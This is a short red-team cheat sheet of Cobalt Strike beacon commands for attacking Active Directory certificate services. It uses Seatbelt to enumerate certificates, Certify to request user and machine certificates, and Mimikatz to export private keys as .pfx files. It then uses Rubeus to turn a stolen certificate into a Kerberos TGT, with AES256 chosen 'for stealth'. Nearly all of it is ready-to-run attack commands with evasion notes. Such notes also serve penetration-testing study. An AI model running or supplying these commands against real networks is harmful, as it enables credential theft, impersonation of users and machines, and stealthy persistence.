To dump existing certficate used for authentication by the current user:
# For user account certs
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe CertificatesIt is also possible to just request a certificate using default templates (see AD CS to obtain a list of CAs):
# For user account certs
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:[ca-srv-fqdn]\[ca-name] /template:User
# For machine account certs
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:[ca-srv-fqdn]\[ca-name] /template:Machine /machineMimikatz can be used to dump certificates to disk (password is “mimikatz”).
# For user account certs
beacon> mimikatz crypto::certificates /export
# For machine account certs
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
# Access via View > Downloads.
beacon> download <filename>.pfxTo use the certificate to obtain TGT (paste base64-encoded certificate; ticket encryption type is set to AES256 for stealth):
# For user account cert
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[user] /certificate:[cert-base64] /password:mimikatz /enctype:aes256 /nowrap
# For machine account cert
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[machine-account] /enctype:aes256 /certificate:[cert-base64] /password:mimikatz /nowrap